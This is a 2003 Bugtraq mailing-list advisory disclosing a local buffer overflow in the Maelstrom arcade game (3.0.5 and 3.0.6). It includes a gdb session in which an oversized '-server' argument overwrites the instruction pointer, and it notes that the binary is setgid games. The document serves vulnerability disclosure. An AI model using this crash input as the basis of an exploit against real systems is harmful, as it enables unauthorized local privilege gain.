[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Message-ID: <20030518135204.12743.qmail@www.securityfocus.com>
Date: 18 May 2003 13:52:04 -0000
From: Luca Ercoli <luca.ercoli@...ind.it>
To: bugtraq@...urityfocus.com
Subject: Maelstrom Buffer Overflow
Maelstrom is an arcade game. There is a buffer overflow vulnerability in
Maelstrom which allow local attacker
arbitrary code execution.
Vulnerable systems: Maelstrom 3.0.6
Maelstrom 3.0.5
Example:
[lucae@...ux]$ gdb /usr/bin/Maelstrom
GNU gdb 5.2.1-2mdk (Mandrake Linux)
Copyright 2002 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you
are
welcome to change it and/or distribute copies of it under certain
conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i586-mandrake-linux-gnu"...
(gdb) set args -server 2@...rl -e 'print "ABCD" x 9999'`
(gdb) r
Starting program: /usr/bin/Maelstrom -server 2@...rl -e 'print "ABCD" x
9999'`
Couldn't resolve host name for ABCDABC......ABCD
Program received signal SIGSEGV, Segmentation fault.
0x41444342 in ?? ()
(gdb) Quit
Note: -rwxr-sr-x 1 root games 171568 19 feb
03:38 /usr/bin/Maelstrom in Linux Professional 9.0
Luca Ercoli luca.ercoli@...ind.it
Powered by blists - more mailing lists